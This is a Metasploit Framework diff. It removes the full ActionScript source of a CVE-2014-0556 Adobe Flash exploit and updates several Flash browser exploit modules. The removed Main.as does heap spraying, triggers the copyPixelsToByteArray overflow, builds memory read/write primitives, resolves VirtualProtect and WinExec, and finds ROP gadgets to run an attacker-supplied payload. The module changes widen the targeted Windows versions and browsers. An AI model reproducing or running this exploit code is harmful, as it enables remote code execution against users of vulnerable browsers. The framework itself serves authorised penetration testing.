diff --git a/data/exploits/CVE-2014-0556/msf.swf b/data/exploits/CVE-2014-0556/msf.swf old mode 100755 new mode 100644 index f6483bd087..3cf2bc3d4f Binary files a/data/exploits/CVE-2014-0556/msf.swf and b/data/exploits/CVE-2014-0556/msf.swf differ diff --git a/external/source/exploits/CVE-2014-0556/Main.as b/external/source/exploits/CVE-2014-0556/Main.as deleted file mode 100755 index da6482075c..0000000000 --- a/external/source/exploits/CVE-2014-0556/Main.as +++ /dev/null @@ -1,185 +0,0 @@ -// Build how to: -// 1. Download the AIRSDK, and use its compiler. -// 2. Download the Flex SDK (4.6) -// 3. Copy the Flex SDK libs (/framework/libs) to the AIRSDK folder (/framework/libs) -// (all of them, also, subfolders, specially mx, necessary for the Base64Decoder) -// 4. Build with: mxmlc -o msf.swf Main.as - -// Original code by @hdarwin89 // http://hacklab.kr/cve-2014-0556-%EB%B6%84%EC%84%9D/ -// Modified to be used from msf - -package -{ - import flash.display.Sprite - import flash.display.BitmapData - import flash.geom.Rectangle - import flash.utils.ByteArray - import flash.display.LoaderInfo - import mx.utils.Base64Decoder - - public class Main extends Sprite - { - private var bv:Vector. = new Vector.(12800) - private var uv:Vector. = new Vector.(12800) - private var bd:BitmapData = new BitmapData(128, 16) - private var i:uint = 0 - - public function Main() - { - var b64:Base64Decoder = new Base64Decoder() - var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh - var pattern:RegExp = / /g; - b64_payload = b64_payload.replace(pattern, "+") - b64.decode(b64_payload) - var payload:String = b64.toByteArray().toString() - - for (i = 0; i < bv.length; i++) { - bv[i] = new ByteArray() - bv[i].length = 0x2000 - bv[i].position = 0xFFFFF000 - } - - for (i = 0; i < bv.length; i++) - if (i % 2 == 0) bv[i] = null - - for (i = 0; i < uv.length; i++) { - uv[i] = new Vector.(1022) - } - - bd.copyPixelsToByteArray(new Rectangle(0, 0, 128, 16), bv[6401]) - - for (i = 0; ; i++) - if (uv[i].length == 0xffffffff) break - - for (var i2:uint = 1; i2 < uv.length; i2++) { - if (i == i2) continue - uv[i2] = new Vector.(1014) - uv[i2][0] = bv[6401] - uv[i2][1] = this - } - - uv[i][0] = uv[i][0xfffffc03] - 0x18 + 0x1000 - bv[6401].endian = "littleEndian" - bv[6401].length = 0x500000 - var buffer:uint = vector_read(vector_read(uv[i][0xfffffc08] + 0x40 - 1) + 8) + 0x100000 - var main:uint = uv[i][0xfffffc09] - 1 - var vtable:uint = vector_read(main) - vector_write(vector_read(uv[i][0xfffffc08] + 0x40 - 1) + 8) - vector_write(vector_read(uv[i][0xfffffc08] + 0x40 - 1) + 16, 0xffffffff) - byte_write(uv[i][0] + 4, byte_read(uv[i][0] - 0x1000 + 8)) - byte_write(uv[i][0]) - - var flash:uint = base(vtable) - var winmm:uint = module("winmm.dll", flash) - var kernel32:uint = module("kernel32.dll", winmm) - var virtualprotect:uint = procedure("VirtualProtect", kernel32) - var winexec:uint = procedure("WinExec", kernel32) - var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash) - var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash) - - byte_write(buffer + 0x30000, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable - byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main - byte_write(0, "\x89\x03", false) // mov [ebx], eax - byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret - - byte_write(buffer + 0x100, payload, true) - byte_write(buffer + 0x20070, xchgeaxespret) - byte_write(buffer + 0x20000, xchgeaxesiret) - byte_write(0, virtualprotect) - - // VirtualProtect - byte_write(0, winexec) - byte_write(0, buffer + 0x30000) - byte_write(0, 0x1000) - byte_write(0, 0x40) - byte_write(0, buffer + 0x80) - - // WinExec - byte_write(0, buffer + 0x30000) - byte_write(0, buffer + 0x100) - byte_write(0) - - byte_write(main, buffer + 0x20000) - this.toString() - } - - private function vector_write(addr:uint, value:uint = 0):void - { - addr > uv[i][0] ? uv[i][(addr - uv[i][0]) / 4 - 2] = value : uv[i][0xffffffff - (uv[i][0] - addr) / 4 - 1] = value - } - - private function vector_read(addr:uint):uint - { - return addr > uv[i][0] ? uv[i][(addr - uv[i][0]) / 4 - 2] : uv[i][0xffffffff - (uv[i][0] - addr) / 4 - 1] - } - - private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void - { - if (addr) bv[6401].position = addr - if (value is String) { - for (var i:uint; i < value.length; i++) bv[6401].writeByte(value.charCodeAt(i)) - if (zero) bv[6401].writeByte(0) - } else bv[6401].writeUnsignedInt(value) - } - - private function byte_read(addr:uint, type:String = "dword"):uint - { - bv[6401].position = addr - switch(type) { - case "dword": - return bv[6401].readUnsignedInt() - case "word": - return bv[6401].readUnsignedShort() - case "byte": - return bv[6401].readUnsignedByte() - } - return 0 - } - - private function base(addr:uint):uint - { - addr &= 0xffff0000 - while (true) { - if (byte_read(addr) == 0x00905a4d) return addr - addr -= 0x10000 - } - return 0 - } - - private function module(name:String, addr:uint):uint - { - var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80), i:int = -1 - while (true) { - var entry:uint = byte_read(iat + (++i) * 0x14 + 12) - if (!entry) throw new Error("FAIL!"); - bv[6401].position = addr + entry - if (bv[6401].readUTFBytes(name.length).toUpperCase() == name.toUpperCase()) break - } - return base(byte_read(addr + byte_read(iat + i * 0x14 + 16))) - } - - private function procedure(name:String, addr:uint):uint - { - var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78) - var numberOfNames:uint = byte_read(eat + 0x18) - var addressOfFunctions:uint = addr + byte_read(eat + 0x1c) - var addressOfNames:uint = addr + byte_read(eat + 0x20) - var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24) - for (var i:uint = 0; ; i++) { - var entry:uint = byte_read(addressOfNames + i * 4) - bv[6401].position = addr + entry - if (bv[6401].readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break - } - return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4) - } - - private function gadget(gadget:String, hint:uint, addr:uint):uint - { - var find:uint = 0 - var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50) - var value:uint = parseInt(gadget, 16) - for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break - return addr + i - } - } -} diff --git a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb index f95e2f8dba..1182b2f2b7 100644 --- a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb +++ b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb @@ -6,7 +6,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking + Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb index 2b401c731b..fccecf14f9 100644 --- a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb +++ b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb @@ -6,7 +6,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking + Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb index dfae2693d6..77e8ce5cbe 100644 --- a/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb +++ b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb @@ -6,9 +6,8 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking + Rank = GreatRanking - include Msf::Exploit::Powershell include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) @@ -47,9 +46,12 @@ class Metasploit3 < Msf::Exploit::Remote 'BrowserRequirements' => { :source => /script|headers/i, - :os_name => OperatingSystems::Match::WINDOWS_7, - :ua_name => Msf::HttpClients::IE, - :flash => lambda { |ver| ver =~ /^14\./ && Gem::Version.new(ver) <= Gem::Version.new('14.0.0.176') }, + :os_name => lambda do |os| + os =~ OperatingSystems::Match::WINDOWS_7 || + os =~ OperatingSystems::Match::WINDOWS_81 + end, + :ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) }, + :flash => lambda { |ver| ver =~ /^14\./ && Gem::Version.new(ver) <= Gem::Version.new('14.0.0.179') }, :arch => ARCH_X86 }, 'Targets' => @@ -82,17 +84,18 @@ class Metasploit3 < Msf::Exploit::Remote def exploit_template(cli, target_info) swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" target_payload = get_payload(cli, target_info) - psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) - b64_payload = Rex::Text.encode_base64(psh_payload) + b64_payload = Rex::Text.encode_base64(target_payload) + platform_id = 'win' + os_name = target_info[:os_name] html_template = %Q| - + - +